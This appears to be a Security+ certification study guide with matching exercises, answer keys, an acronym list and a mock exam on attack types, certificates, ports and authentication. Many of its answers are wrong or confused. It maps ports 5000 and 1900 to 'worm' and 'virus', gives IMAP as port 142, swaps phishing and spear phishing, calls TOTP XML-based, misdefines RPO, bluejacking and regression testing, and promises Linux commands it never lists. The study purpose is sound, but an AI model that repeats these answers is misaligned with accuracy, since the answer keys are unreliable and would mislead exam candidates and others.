Session hijacking—familiarity—whaling—DDoS—smurf—pharming—phishing—zero day virus—tailgating—virus—replay attack—vishing—spear phishing—worm—man in the middle—social engineering, urgency—XSS—ransomware—ransomware—remote access Trojan—logic bomb—christmas tree attack—pass the hash—Bluejacking

Practical 1—drag and drop—attacks

Put the correct answer against each item

Target the CEO only


Directed IP broadcast to the border router


Holding the door open for someone else


Attack using port 5000


Interception attack in real time


Interception attack, one day delay


Stealing someone's cookie


Leaving a voicemail for the CEO


Letting a fireman into your server room


Redirected to a fraudulent website


Email to a group of people to get bank details


Email to one person to get bank details


Letting someone you know access a secure area


Forcing someone to pay to recover their data


Send login details back to an attacker


An attack using port 445


Triggered by an event or action


Set the PSH, Fin, and URG all to 1


Attack using port 1900


An attack that NTLM vulnerable to


A host flooded by multiple SYN flood attacks


An attack using HTML tags and JavaScript


Taking control of someone's phone


An attack for which there is no fix


Practical 2—drag and drop—certificates

Please place the answers against the description:

SAN—HSM—exchange keys—Wildcard—CSR—Bridge Trust Model—CRL—pinning—OCSP—PGP—Base64 format—Diffie-Hellman—P12—public CA—OID—key escrow—P7B—certificate template—.pfx—The faster it is but the less secure—.cer—CA—architect—stapling

Practical 2—drag and drop—certificates

Put the correct answer against each item

The CA used for b2b


Certificate used on multiple servers one domain


Private key file extension


Is my certificate valid


First part of encryption


Public key file format


Certificate used on servers in multiple domains


Who signs the X509 certificates


Create new keys


CRL is going slow, so we implement what?


Private key format


Prevent CA compromise


X509 serial number


Stores private keys


PKI to PKI trust


PEM


Creates a secure tunnel


Stores the keys for the key escrow


Public key file format


He builds the CA and/or intermediary


Web server bypassing CRL to go to OCSP


Where is the X509 issuance policy held


What uses a web of trust


The smaller the key...




Practical 3—drag and drop—ports/protocol

Please place the answers against the description:

636—21—443—389—UDP 161—22—5060 -53—989/990—5000—3389—UDP 162—1900—22—443 137-139—993—445—23 -110—142—80—25—995

Practical 3—drag and drop—ports/protocols

Put the correct answer against each item

Lightweight Directory Access Protocol (LDAP)


Domain Naming System (DNS)


Remote Desktop Protocol (RDP)


Simple network management protocol


Secure copy protocol


Lightweight Directory Access Protocol Secure (LDAPS)


File transfer protocol—passive


FTPS


Simple network management protocol—secure


Secure shell


Telnet


IMAP 4


POP 3 secure


Simple Mail Transfer Protocol (SMTP)


SIP


Worm


IMAP 4 secure


Virus


Ransomware


NETBIOS


TLS


HTTP


POP 3


HTTPS


Practical 4—drag and drop—authentication factors

Please place the answers against the description:

Palm reader—federation services—PIN—Gait—PSK—password—london—WPS—fingerprint—natural signature—smart card—birth date—Kerberos—token—retina—swipe—Iris—federation services

Practical 4—drag and drop—authentication factors—answers

Put the correct answer against each item

Somewhere you are


Third-party to third-party authentication


SAML—XML-based authentication


Something you are


Something you are


Something you are


Something you are


Something you know


Something you know


Something you know


Something you do


Something you do


Something you do


Prevents replay attacks


Wireless router password


Wireless—no password


Something you have


Something you have




Practical 5—drag and drop—general

Please place the answers against the description:

Stored procedure—SSO—disable account, reset password—screen locks—symmetric encryption—cable locks—2—office—standard naming convention—Geotracking—protocol analyzer—banner grabbing—proximately card—on-boarding—3—group policy—input validation—double—single—strong passwords—cable locks—office—passwords—RFID—2—4

Practical 5—drag and drop—general—answers

Put the correct answer against each item

Capture a command on a network


Where you keep a safe


Authentication—provides most errors


Web server information


Identity type of computer in a report


Prevents SQL injection


Prevents SQL injection


RAID 0—minimum disks


Where you keep keys


Configures multiple settings on computers


RAID 6—parity


Policy used for BYOD commencing


Kerberos authentication


Prevents laptops being stolen


Authentication for an office


RAID 5—minimum disks


Encrypts large amounts of data


RAID 5—parity


Finds a mobile device


Person leaves—what do you do with the account?


Prevents stealing a device from a ship


Makes mobile device secure


RAID 1—number of disks

2

Prevents tablet being stolen


Makes mobile device secure


RAID 6—minimum disks




Drag and drop—answers

Practical 1—drag and drop—attacks—answer

Put the correct answer against each item

Target the CEO only

Whaling

Directed IP broadcast to the border router

Smurf

Holding the door open for someone else

Tailgating

Attack using port 5000

Worm

Interception attack in real time

Man in the Middle

Interception attack, one day delay

Replay attack

Stealing someone's cookie

Session Hijacking

Leaving a voicemail for the CEO

Vishing

Letting a fireman into your server room

Social Engineering—Urgency

Redirected to a fraudulent website

Pharming

Email to a group of people to get bank details

Spear Phishing

Email to one person to get bank details

Phishing

Letting someone you know access a secure area

Familiarity

Forcing someone to pay to recover their data

Ransomware

Send login details back to an attacker

Remote Access Trojan

An attack using port 445

Ransomware

Triggered by an event or action

Logic Bomb

Set the PSH, Fin, and URG all to 1

Christmas Tree Attack

Attack using port 1900

Virus

An attack that NTLM vulnerable to

Pass the Hash

A host flooded by multiple SYN flood attacks

DDoS

An attack using HTML tags and JavaScript

XSS

Taking control of someone's phone

Bluejacking

An attack for which there is no fix

Zero Day Virus



Practical 2—drag and drop—certificates—answers 

Put the correct answer against each item

The CA used for b2b

Public CA

Certificate used on multiple servers one domain

Wildcard

Private key file extension

.pfx

Is my certificate valid

CRL

First part of encryption

Exchange keys

Public key file format

.cer

Certificate used on servers in multiple domains

SAN

Who signs the X509 certificates

CA

Create new keys

CSR

CRL going slow, implement what?

OCSP

Private key format

P12

Prevent CA compromise

Pinning

X509 serial number

OID

Stores private keys

Key escrow

PKI to PKI trust

Bridge Trust Model

PEM

Base 64 format

Creates a secure tunnel

Diffie—Hellman

Stores the keys for the key escrow

HSM

Public key file format

P7B

He builds the CA and/or intermediary

Architect

Web server bypassing CRL to go to OCSP

Stapling

Where is the X509 issuance policy held

Certificate Template

What uses a web of trust

PGP

The smaller the key...

The faster but less secure the encryption



Practical 3—drag and drop—ports/protocols—answers

Put the correct answer against each item

Lightweight Directory Access Protocol (LDAP)

389

Domain Naming System (DNS)

53

Remote Desktop Protocol (RDP)

3389

Simple network management protocol

UDP 161

Secure copy protocol

22

Lightweight Directory Access Protocol Secure (LDAPS)

636

File transfer protocol—passive

21

FTPS

989/990

Simple network management protocol— secure

UDP 162

Secure shell

22

Telnet

23

IMAP 4

142

POP 3 secure

995

Simple Mail Transfer Protocol (SMTP)

smtp 25

SIP

sip 5061

Worm

5000

IMAP 4 secure

993

Virus

1900

Ransomware

445

NETBIOS

137-139

TLS

443

HTTP

80

POP 3

110

HTTPS

443

Practical 4—drag and drop—authentication factors—answers

Put the correct answer against each item

Somewhere you are

London

Third-party to third-party authentication

Federation services

SAML—XML-based authentication

Federation services

Something you are

Palm reader

Something you are

Retina

Something you are

Iris

Something you know

Password

Something you know

PIN

Something you know

Birth Date

Something you do

Swipe

Something you do

Natural signature

Something you do

Gait

Prevents replay attacks

Kerberos

Wireless router password

PSK

Wireless—no password

WPS

Something you have

Token

Something you have

Smart Card

Practical 5—drag and drop—general—answershii

Put the correct answer against each item

Capture the command on a network

Protocol analyzer

Where you keep a safe

Office

Authentication—provides most errors

Passwords

Web server information

Banner grabbing

Identity type of computer in a report

Standard naming convention

Prevent SQL injection

Input validation

Prevent SQL injection

Stored procedure

RAID 0—minimum disks

2

Where you keep keys

Office

Configures multiple settings on computers

Group policy

RAID 6— parity

Double

Policy used for BYOD commencing

Onboarding

Kerberos authentication

SSO

Prevent laptops being stolen

Cable locks

Authentication for an office

Proximately card

RAID 5—minimum disks

3

Encrypts large amount of data

Symmetric encryption

RAID 5—parity

Single

Finds a mobile device

Geolocation

Person leaves—what do you do with the account?

Disable account, reset password

Prevents stealing a device from a ship

RFID

Makes mobile device secure

Strong passwords

RAID 1—number of disks

2

Prevents tablet being stolen

Cable locks

Makes mobile device secure

Screen locks

RAID 6—minimum disks

4



Linux information

Although Linux is not mentioned in the exam syllabus, the Security+ is vendor neutral and the following commands may help you determine what is being asked:

Acronyms

Triple Digital Encryption Standard (3DES)

Authentication, Authorization, and Accounting (AAA)

Attribute-based Access Control (ABAC)

Access Control List (ACL)

Advanced Encryption Standard (AES)

Authentication Header (AH)

Annualized Loss Expectancy (ALE)

Access Point (AP)

Application Programming Interface (API)

Advanced Persistent Threat (APT)

Annualized Rate of Occurrence (ARO)

Address Resolution Protocol (ARP)

Acceptable Use Policy (AUP)

Antivirus (AV)

Asset Value (AV)

Business Continuity Planning (BCP)

Business Impact Analysis (BIA)

Business Partners Agreement (BPA)

Bring Your Own Device (BYOD)

Certificate Authority (CA)

Common Access Card (CAC)

Cloud Access Security Broker (CASB)

Cipher Block Chaining (CBC)

Counter-Mode/CBC-Mac Protocol (CCMP)

Closed-circuit Television (CCTV)

Certificate (CER)

Cross-over Error Rate (CER)

Challenge Handshake Authentication Protocol (CHAP)

Chief Information Officer (CIO)

Computer Incident Response Team (CIRT)

Content Management System (CMS)

Continuity of Operations Plan (COOP)

Corporate Owned, Personally Enabled (COPE)

Contingency Planning (CP)

Certificate Revocation List (CRL)

Computer Security Incident Response Team (CSIRT)

Chief Security Officer (CSO)

Cloud Service Provider (CSP)

Certificate Signing Request (CSR)

Cross-site Request Forgery (CSRF)

Chief Technology Officer (CTO)

Choose Your Own Device (CYOD)

Discretionary Access Control (DAC)

Distributed Denial of Service (DDoS)

Data Execution Prevention (DEP)

Distinguished Encoding Rules (DER)

Digital Encryption Standard (DES)

Dynamic Host Configuration Protocol (DHCP)

Diffie—Hellman (DH)

Diffie—Hellman Ephemeral (DHE)

Dynamic Link Library (DLL)

Data Loss Prevention (DLP)

Demilitarized Zone (DMZ)

Domain Name Service (Server) (DNS)

Denial of Service (DoS)

Disaster Recovery Plan (DRP)

Extensible Authentication Protocol (EAP)

Electronic Code Book (ECB)

Elliptic Curve Cryptography (ECC)

Elliptic Curve Diffie—Hellman Ephemeral (ECDHE)

Encrypted File System (EFS)

Electromagnetic Interference (EMI)

Electro Magnetic Pulse (EMP)

Encapsulated Security Payload (ESP)

End User License Agreement (EULA)

File System Access Control List (FACL)

False Acceptance Rate (FAR)

Full Disk Encryption (FDE)

False Rejection Rate (FRR)

File Transfer Protocol (FTP)

Secured File Transfer Protocol (FTPS)

Galois Counter Mode (GCM)

Gnu Privacy Guard (GPG)

Group Policy Object (GPO)

Global Positioning System (GPS)

High Availability (HA)

Hard Disk Drive (HDD)

Host-based Intrusion Detection System (HIDS)

Host-based Intrusion Prevention System (HIPS)

Hashed Message Authentication Code (HMAC)

HMAC-based One-Time Password (HOTP)

Hardware Security Module (HSM)

Infrastructure as a Service (IaaS)

Internet Control Message Protocol (ICMP)

Intrusion Detection System (IDS)

Institute of Electrical and Electronic Engineers (IEEE)

Internet Information System (IIS)

Internet Key Exchange (IKE)

Instant Messaging (IM)

Internet Message Access Protocol v4 (IMAP4)

Internet of Things (IoT)

Internet Protocol (IP)

Internet Protocol Security (IPSec)

Incident Response (IR)

Incident Response Plan (IRP)

Interconnection Security Agreement (ISA)

Internet Service Provider (ISP)

Information Systems Security Officer (ISSO)

Initialization Vector (IV)

Layer 2 Tunnelling Protocol (L2TP)

Local Area Network (LAN)

Lightweight Directory Access Protocol (LDAP)

Lightweight Extensible Authentication Protocol (LEAP)

Monitoring as a Service (MaaS)

Mandatory Access Control (MAC)

Media Access Control (MAC)

Master Boot Record (MBR)

Message Digest 5 (MD5)

Mobile Device Management (MDM)

Multifactor Authentication (MFA)

Multi-function Device (MFD)

Multipurpose Internet Mail Exchange (MIME)

Man-in-the-Middle (MITM)

Multimedia Message Service (MMS)

Memorandum of Agreement (MOA)

Memorandum of Understanding (MOU)

Microsoft Challenge Handshake Authentication Protocol (MSCHAP)

Mean Time Between Failures (MTBF)

Mean Time to Failure (MTTF)

Mean Time to Recover or Mean Time to Repair (MTTR)

Network Access Control (NAC)

Network Address Translation (NAT)

Non-disclosure Agreement (NDA)

Near Field Communication (NFC)

Network-based Intrusion Detection System (NIDS)

Network-based Intrusion Prevention System (NIPS)

New Technology File System (NTFS)

New Technology LAN Manager (NTLM)

Network Time Protocol (NTP)

Open Authorization (OAUTH)

Online Certificate Status Protocol (OCSP)

Object Identifier (OID)

Operating System (OS)

Peer to Peer (P2P)

Platform as a Service (PaaS)

Password Authentication Protocol (PAP)

Port Address Translation (PAT)

Password-based Key Derivation Function 2 (PBKDF2)

Protected Extensible Authentication Protocol (PEAP)

Privacy-enhanced Electronic Mail (PEM)

Perfect Forward Secrecy (PFS)

Personal Exchange Format (PFX)

Pretty Good Privacy (PGP)

Personal Health Information (PHI)

Personally Identifiable Information (PII)

Personal Identity Verification (PIV)

Public Key Infrastructure (PKI)

Padding Oracle on Downgrade Legacy Encryption (POODLE)

Post Office Protocol (POP)

Pre-shared Key (PSK)

Recovery Agent (RA)

Registration Authority (RA)

Remote Authentication Dial-in User Server (RADIUS)

Redundant Array of Inexpensive Disks (RAID)

Remote Access Server (RAS)

Remote Access Trojan (RAT)

Role-based Access Control (RBAC)

Rule-based Access Control (RBAC)

Rivest Cipher version 4 (RC4)

Remote Desktop Protocol (RDP)

Representational State Transfer (REST)

Radio Frequency Identifier (RFID)

RACE Integrity Primitives Evaluation Message Digest (RIPEMD)

Return on Investment (ROI)

Risk Management Framework (RMF)

Recovery Point Objective (RPO)

Rivest, Shamir, and Adleman (RSA)

Recovery Time Objective (RTO)

Real-time Operating System (RTOS)

Real-time Transport Protocol (RTP)

Secure/Multipurpose Internet Mail Extensions (S/MIME)

Software as a Service (SaaS)

Security Assertions Markup Language (SAML)

Storage Area Network (SAN)

Subject Alternative Name (SAN)

System Control and Data Acquisition (SCADA)

Security Content Automation Protocol (SCAP)

Simple Certificate Enrollment Protocol (SCEP)

Secure Copy (SCP)

Small Computer System Interface (SCSI)

Software Development Kit (SDK)

Self-Encrypting Drive (SED)

Structured Exception Handler (SEH)

Secured File Transfer Protocol (SFTP)

Secure Hashing Algorithm (SHA)

Security Information and Event Management (SIEM)

Subscriber Identity Module (SIM)

Session Initiation Protocol (SIP)

Session Initiation Protocol Secure (SIPS)

Service Level Agreement (SLA)

Single Loss Expectancy (SLE)

Server Message Block (SMB)

Short Message Service (SMS)

Simple Mail Transfer Protocol (SMTP)

Simple Mail Transfer Protocol Secure (SMTPS)

Simple Network Management Protocol (SNMP)

System on Chip (SoC)

Sender Policy Framework (SPF)

Spam over Internet Messaging (SPIM)

Single Point of Failure (SPoF)

Structured Query Language (SQL)

Secure Real-Time Protocol (SRTP)

Solid State Drive (SSD)

Secure Shell (SSH)

Service Set Identifier (SSID)

Secure Sockets Layer (SSL)

Single Sign-on (SSO)

Terminal Access Controller Access Control System Plus (TACACS+)

Transmission Control Protocol/Internet Protocol (TCP/IP)

Ticket Granting Ticket (TGT)

Temporal Key Integrity Protocol (TKIP)

Transport Layer Security (TLS)

Time-based One-time Password (TOTP)

Trusted Platform Module (TPM)

User Acceptance Testing (UAT)

Unmanned Aerial Vehicle (UAV)

User Datagram Protocol (UDP)

Unified Extensible Firmware Interface (UEFI)

Uniform Resource Identifier (URI)

Universal Resource Locator (URL)

Universal Serial Bus (USB)

OTG USB On The Go (USB)

Unified Threat Management (UTM)

Unshielded Twisted Pair (UTP)

Virtual Desktop Environment (VDE)

Virtual Desktop Infrastructure (VDI)

Virtual Local Area Network (VLAN)

Virtual Machine (VM)

Voice over IP (VoIP)

Virtual Private Network (VPN)

Video Teleconferencing (VTC)

Web Application Firewall (WAF)

Wireless Access Point (WAP)

Wired Equivalent Privacy (WEP)

Wireless Intrusion Prevention System (WIPS)

Write Once Read Many (WORM)

Wi-Fi Protected Access (WPA)

Wi-Fi Protected Access 2 (WPA2)

Wi-Fi Protected Setup (WPS)

Exclusive Or (XOR)

Cross-Site Request Forgery (XSRF)

Cross-Site Scripting (XSS)

Assessment

Mock Exam 1

  1. What type of attack is a padding oracle on downgraded legacy encryption attack? Choose two from the following list:

A. IV attack

B. Replay attack

C. Man-in-the-middle attack

D. TLS 1.0 with electronic code book

E. SSL 3.0 with chain block cipher

Answer: C and E

Concept: A POODLE attack is a man-in-the-middle attack that exploits a downgraded browser using SSL 3.0 with CBC.

  1. You are the security administrator for the British secret service. What type of access method will you use for secret and top-secret data?

A. DAC, with the owner of the data giving access

B. DAC, with the custodian of the data giving access

C. DAC, with the security administrator giving access

D. MAC, with the security administrator giving access

Answer: D

Concept: MAC is used as the access method for classified data and the security administrator is responsible for giving users access to the data once the person has been vetted and access is justified.

  1. Your company wants to encrypt the DNS traffic by using DNSSEC. Once you have signed the zone, what records are created for each host?

A. CNAME

B. AAAA

C. RRSIG

D. MX

E. PTR

Answer: C

Concept: DNSSEC creates DNSKEY and RRSIG records.

Wrong answers:

A. CAME is an alias

B. AAAA is a host record for IP version 6

D. An MX record is for a mail server

E. PTR records are created in the reverse lookup zone

  1. You are a security administrator and a user called Ben is having a discussion with one of his colleagues. They have four choices for two-factor authentication. They have asked for your advice on which of the following involves two-factor authentication. Select the BEST answer:

A. Smart card

B. Password and PIN

C. Passphrase and username

D. Retina and fingerprint scan

Answer: A

Concept: Two-factor authentication entails using two different groups something you have, something you know, something you are, or somewhere you are. A smart card is something you have, but needs a PIN, which is something you know.

Wrong answers:

B. Both are something you know

C. Both are something you know

D. Both are something you are

  1. Two separate CAs need to work together on a joint venture; what can they implement so that certificates can be used for cross-certification?

A. Bridge trust model

B. Certificate pinning

C. Certificate stapling

D. Wildcard certificates

Answer: A

Concept: A bridge trust model is used where two root CAs are used to set up cross-certification.

Wrong answers:

B. Pinning prevents someone hacking the CA and issuing fraudulent certificates

C. Stapling is used by a web server that bypass the CRL and use the OCSP for faster validation

D. Wildcard certificates can be used by multiple servers in the same domain

  1. John goes to a sports website and gets the following error:

THIS WEBSITE CANNOT BE TRUSTED.

What two actions does the website administrator need to take to resolve this error?

A. Ask the key escrow to store his private key

B. Ensure that the website uses a valid SAN certificate

C. Update the root certificate into the client computer trusted root certificate authorities store

D. Verify whether the certificate on the server has expired

Answer: C and D

Concept: A certificate needs to be valid and trusted by the computer.

Wrong answers:

A. The key escrow only stores private keys

B. A SAN certificate can be used across multiple domains

  1. A security administrator discovers that an attacker used a compromised host as a platform for launching attacks deeper into a company's network. What terminology BEST describes the use of the compromised host?

A. Brute force

B. Active reconnaissance

C. Pivoting

D. Passing point

Answer: C

Concept: Pivoting involves using a weak host to launch an attack further into the network.

Wrong answers:

A. Brute force is a password attack

B. Active reconnaissance is a penetration attack method

D. Passing point does not exist; it just sounds good—a red herring

  1. Mary is managing the company's wireless network, which will use WPA2-PSK. What encryption is MOST likely to be used?

A. SHA-1

B. AES

C. MD5

D. DES

Answer: B

Concept: The encryption that WPA2 is most likely to use is AES.

Wrong answers:

A. SHA-1 is used for hashing

C. MD5 is also used for hashing

D. DES is not used by wireless technology

  1. Who is responsible for setting permissions when using a Mandatory Access Control (MAC) model?

A. The owner

B. The manager

C. The administrator

D. The user

Answer: C

Concept: MAC gives access to data based on the file classification (for example, top secret); the security administrator sets permissions.

Wrong answers:

A. Owners can give access using the DAC model, but once a classified document is written, it has no owner, and it is controlled centrally

B. Managers cannot grant any permissions to data

D. A user cannot grant access to any data

  1. Company A is due to upgrade all of its IT systems and has been investigating moving to the cloud as there is no capital expenditure, since the CSP provides the hardware. Company A would still like to control the IT systems in the cloud. Which cloud model would BEST serve Company A's needs?

A. Software as a Service (SaaS)

B. Infrastructure as a Service (IaaS)

C. Monitoring as a Service (MaaS)

D. Platform as a Service (PaaS)

Answer: B 

Concept: IaaS provides the hardware as bare metal. Then you need to install the software, configure it, and patch it.

Wrong answers:

A. SaaS is where you lease a bespoke software package that is accessed through a web browser

C. MaaS is where someone monitors your network or applications for you

D. PaaS is a development platform in the cloud

  1. You are a security administrator, and the IT director has tasked you with collecting the volatile memory on Server 1 as it is currently under a cyber attack. Which of the following are the two BEST forms of volatile memory to collect?

A. Secure boot

B. Swap/page file

C. USB flash drive

D. ROM

E. RAM

Answers: B and E 

Concept: Always collect the volatile evidence before stopping a cyber attack in order to detect the source. Volatile memory evaporates if the power is switched off. RAM is volatile and the swap/page file is where applications run when RAM is full.

Wrong answers:

A. Secure boot checks that all drivers are signed on boot up

C. USB flash drive is nonvolatile

D. ROM is nonvolatile

  1. Bill and Ben the flower pot men are now going to encrypt data using asymmetric encryption, which uses public and private keys. What is the FIRST step they need to take?

A. Exchange public keys

B. Exchange private keys

C. Exchange digital signatures

D. Exchange telephone numbers

Answer: A

Concept: The first stage in any encryption is key exchange, where you send your public key to someone else.

Wrong answers:

B. You should never give your private key away

C. You digitally sign the document and email using your private key to provide non-repudiation and integrity; they are never exchanged

D. Exchanging telephone number is just a red herring

  1. At what stage of the SDLC are computer systems no longer supported by the original vendor?

A. Sandboxing

B. End-of-life systems

C. Resource exhaustion

D. System sprawl

Answer: B

Concept: End-of-life systems are no longer operational or supported by the vendor.

Wrong answers:

A. Sandboxing is the isolation of an application for testing, patching, or isolation, as it is dangerous

C. Resource exhaustion is where a system has run out of resources

D. System sprawl is where a system is overutilizing resources and is heading toward resource exhaustion

  1. Company A has just developed a bespoke system for booking airline tickets. What is it called if a freelance coding specialist tests it for security flaws?

A. Code review

B. Static code review

C. Regression testing

D. Dynamic code review

Answer: C 

Concept: Regression testing is part of program development, and in larger companies is done by code-testing specialists.

Wrong answers:

A. Code review is carried out on a regular basis to identify dead code

B. Static code review is done when the code is not being used

D. Dynamic code review is done when the code is running

  1. You are the security administrator for a company that has just replaced two file servers. Which of the following is the BEST solution for disposing of hard drives that used to store top secret data?

A. Hashing

B. Degaussing

C. Low-level formatting

D. Shredding

Answer: D

Concept: You can shred a whole hard drive down until it looks like powder—let someone try to put that back together again.

Wrong answers:

A. Hashing does not destroy data; it merely says where integrity is intact

B. Degaussing should dispose of the data, but the better solution would be to totally destroy the hard drive itself

C. Low-level formatting replaces the tracks and sectors, but is not as effective as shredding

  1. You are the security administrator for an airline company whose systems suffered a loss of availability last month. Which of the following attacks would MOST likely affect the availability of your IT systems?

A. Spear phishing

B. Replay

C. MITM

D. DoS

Answer: D

Concept: DDoS and DoS attack the availability of IT systems, as they both aim to take them down.

Wrong answers:

A. Spear phishing is an email scam targeted at a group of people

B. Replay is an MITM attack that replays messages between two entities at a later date

C. MITM intercepts conversations between two entities, making them believe that they are talking to each other when they are actually talking to the attacker


  1. You are a network administrator setting up a L2TP/IPSec VPN tunnel, as your company needs to move a large amount of encrypted data between the branch office and the head office. Why is Diffie Hellman used for the IKE phase before the data is forwarded via symmetric encryption?

A. It is a symmetric encryption technique that protects keys

B. It is a hashing technique that protects keys

C It is an ephemeral technique that protect keys

D. It is an asymmetric technique that protects keys, but sets up a secure channel

Answer: D

Concept: Diffie Hellman is asymmetric and has both a private and public key pair. Its role is not encryption but the creation of a secure tunnel for symmetric data to flow through and protect the only key from being stolen.

Wrong answers:

A. Diffie Hellman has two keys, while symmetric encryption has only one key

B. Hashing provides integrity of data, but you can still read it so it, doesn't actually protect it

C. Ephemeral techniques use short-lived, one-session-only keys

  1. You are a lecturer in a college and you need to deliver a session on salting passwords. What are the two main reasons you would salt passwords?

A. To prevent brute-force attacks

B. To make access to the password slower

C. To prevent duplicate passwords from being stored

D. To stop simple passwords from being used

Answer: A and C

Concept: Salting passwords adds a random number to the password, making it longer in order to prevent brute-force attacks. This will prevent duplicate passwords, as each salt is different, and therefore each password will be unique as each will have a unique salt.

Wrong answers:

B. This is probably true, but is not a main reason. We don't salt for speed—we salt to protect the password

D. Salting cannot prevent someone from using 12345678 as their password; that would be password complexity

  1. Which of the following methods of authentication is known as two-factor authentication?

A. PIN and passphrase

B. Mastercard and PIN

C. Username and password

D. Retina and facial recognition

Answer: B 

Concept: Two-factor authentication involves using two separate groups from something you have, something you know, something you are, or somewhere you are. A card is something you have and a PIN is something you know.

Wrong answers:

A. Both are something you know

C. Both are something you know

D. Both are something you are

  1. During a forensic investigation, the judge has decreed that any data that is investigated should remain in its original form of integrity. Which of the following is used for the integrity of data? Choose two:

A. MD5

B. AES

C. SHA 1

D. DES

Answer: A and C

Concept: Hashing is used to provide integrity of data; MD5 and SHA1 are two forms of hashing.

Wrong answers:

B. AES is used for encryption

D. DES is used for encryption

  1. Company A has suffered a distributed-denial-of-service attack, and the company has decided that their RPO should be set at four hours. The directors are holding a board meeting to discuss the progress that is being made. During this meeting, the IT manager has mentioned the Return Time Object (RTO), and the CEO looks confused. How can you explain the meaning of the RTO to the CEO?

A. Acceptable downtime

B. Return to operational state

C. Measure of reliability

D. Average time to repair

Answer: B 

Concept: The RTO means that the system updates are running. This can also be known as the return to operational state.

Wrong answers:

A. Acceptable downtime is another way of saying recovery point objective

C. A measure of reliability would be the Mean Time Between Failures (MTBF)

D. Average time to repair is the same as the MTTR

  1. The following is a list of different controls. Which of these are physical security controls?

A. Change management

B. Antivirus software

C. Cable locks

D. Firewall rule

F. Iris scanner

Answers: C and F

Concept: You can touch physical security controls; therefore, cable locks are physical and the iris scanner is a physical device for biometric authentication.

Wrong answers:

A. Change management is an administrative control

B. Antivirus is a technical control

D. Firewall rules are technical controls

  1. The security team has identified an unknown vulnerability and isolated it. What technique is BEST for investigating and testing it?

A. Steganography

B. Fuzzing

C. Sandboxing

D. Containerization

Answer: C 

Concept: Sandboxing is where we put an application in an isolated virtual machine to test patches, or maybe just because the application is too dangerous to run on our network.

Wrong answers:

A. Steganography involves hiding a file, image, audio file, or video file inside another file, image, audio file, or video file

B. Fuzzing is a technique for inserting random data inside an application to test for vulnerabilities

D. Containerization is where data is isolated in a mobile phone to separate business data from personal data, such as pictures of family and friends

  1. What is it called when a user has exploited an IT system so that they have obtained access to all files on the file server?

A. Remote exploit

B. Zero-day exploit

C. Privilege escalation

D. Pivoting

Answer: C

Concept: Privilege escalation is where a normal user has obtained admin rights to access resources they should not normally be allowed to access.

Wrong answers:

A. A remote exploit scans a network for vulnerabilities and then attacks it

B. A zero-day exploit is where an exploit has just been discovered (on day zero), but there is not going to be a patch for it for maybe another 2-3 days

D. Pivoting involves accessing a machine inside a network from which you can launch a second attack

  1. You are the security administrator for your company, and the IT manager has asked you to brief them on XML authentication methods. Which of the following should you tell them uses XML-based authentication? Select all that apply:

A. TOTP

B. Federation services

C. Smart card

D. SSO

E. SOAP

F. SAML

Answer: A, B, and F

Concept: SAML is an XML-based types of authentication used in federation services; TOTP is also XML-based.

Wrong answers:

C. A smart card uses X509 and a PIN for authentication

D. SSO means you sign in once and then gain access to all resources without putting your credentials in again

E. SOAP messages are used in SAML

  1. There are a group of certificates in a folder and you need to identify which certificate uses the Privacy-Enhanced Mail (PEM) format. Which of the following is the BEST choice to make?

A. PFX

B. CER

C. Base64

D. P12

Answer: C

Concept: PEM uses Base64 format.

Wrong answers:

A. This is a private certificate

B. This is a public certificate

D. This is a private certificate

  1. Three different companies want to develop an application where they will share the cost of developing resources and future running costs. Which cloud model BEST describes this?

A. Public cloud

B. SaaS

C. Private cloud

D. PaaS

E. IaaS

F. Community cloud

Answer: F 

Concept: Community clouds involves companies from the same industry developing their own cloud that they can then share resources on.

Wrong answers:

A. A public cloud is multitenant, and the tenants never share resources

B. SaaS is where a bespoke application is leased by different people

C. A private cloud is single tenant. They don't share with anyone

D. PaaS refers to a development platform, such as Azure

E. IaaS refers to leasing hardware

  1. What type of key does a key escrow manage?

A. Public

B. Session

C. Shared

D. Private

Answer: D

Concept: The key escrow stores private keys for third parties.

Wrong answers:

A. The public key is used for encryption; it is always given away, but never stored

B. The session key is used for communication between two hosts

C. The shared key is used for symmetric encryption

  1. Which of the following is an email-based attack on all members of the sales team?

A. Phishing

B. Vishing

C. Spear phishing

D. Pharming

Answer: C

Concept: Spear phishing is an attack on a group of users.

Exam tip:
Whereas the plural of spear phishing is spear phishing, the singular can be phishing.

Wrong answers:

A. Phishing is an email attack against one person

B. A vishing attack is launched by using a telephone or leaving a voicemail

D. A pharming attack involves redirecting

  1. An attacker tries to target a high-level executive, but has to leave a voicemail as they did not answer the telephone. What was the intended attack, and what attack was eventually was used? Select all that apply:

A. Whaling

B. Vishing

C. Phishing

D. Spear phishing

Answer: B

Concept: Vishing involves targeting a victim using a telephone or leaving a telephone message.

Wrong answers:

A. This is not whaling, as the medium of attack was a telephone—don't be tricked

C and D. Phishing and spear phishing are email attacks

  1. The auditor has been investigating money being stolen from a charity, and they have discovered that the finance assistant has been embezzling money, as they were the only person who dealt with finance, by receiving donations and paying all of the bills. Which of the following is the best option that the auditor should recommend to reduce the risk of this happening again?

A. Hashing

B. Job rotation

C. Separation of duties

D. Mandatory vacations

E. Encryption

Answer: C

Concept: Separation of duties prevents one person from authorizing the whole transaction, and also prevents fraud. The CA signs the X509 certificates.

Wrong answers:

A. Hashing ensures that data has not been tampered with, thus providing integrity

B. Job rotation prevents fraud; however, a charity may only have one person working in finance

D. Mandatory vacations prevent fraud, but require someone else who can deal with finance work

E. Encrypting data protects data, but has nothing to do with financial transactions

  1. You are a security administrator and you have now moved departments. You are now working with the certificate authority and training Mary, who is a new intern. Mary has asked you what the certificate Object Identifier (OID) consists of. What should you tell her?

A. Certificate signing request

B. Certificate pinning

C. Certificate stapling

D. Certificate serial number

Answer: D

Concept: The OID identifies the X509 itself. It is similar to a serial number; each X509 has a different OID.

Wrong answers:

A. A CSR is a request for a new certificate

B. Pinning prevents the compromise of the CA and the issuing of certificates

C. Stapling is where a web server goes directly to the OCSP for faster authentication, bypassing the CRL

  1. You are the operational manager for a multinational corporation and you are writing a policy in which you mention the RPO. Which of the following is the CLOSEST definition to the RPO?

A. Acceptable downtime

B. Return to operational state

C. A measure of the system reliability

D. Average time to repair

Answer: A

Concept: The RPO is the amount of downtime your system can have without having access to its data.

Wrong answers:

B. The return to operational state is the RTO

C. The mean time between failures is a measure of the system reliability

D. The mean time to repair is the average time to repair

  1. You are carrying out annual training about your company and need to put a PowerPoint slide together for the symptoms of a backdoor virus. Which three points will you include in the slide? Each provides part of the explanation of a backdoor virus:

A. Programs will not open at all, even though you click many times

B. You must click on several items

C. Can be included in an email attachment

D. Files open quicker than before

E. You can only get infected through a link on a webpage

Answers: A, B, and C

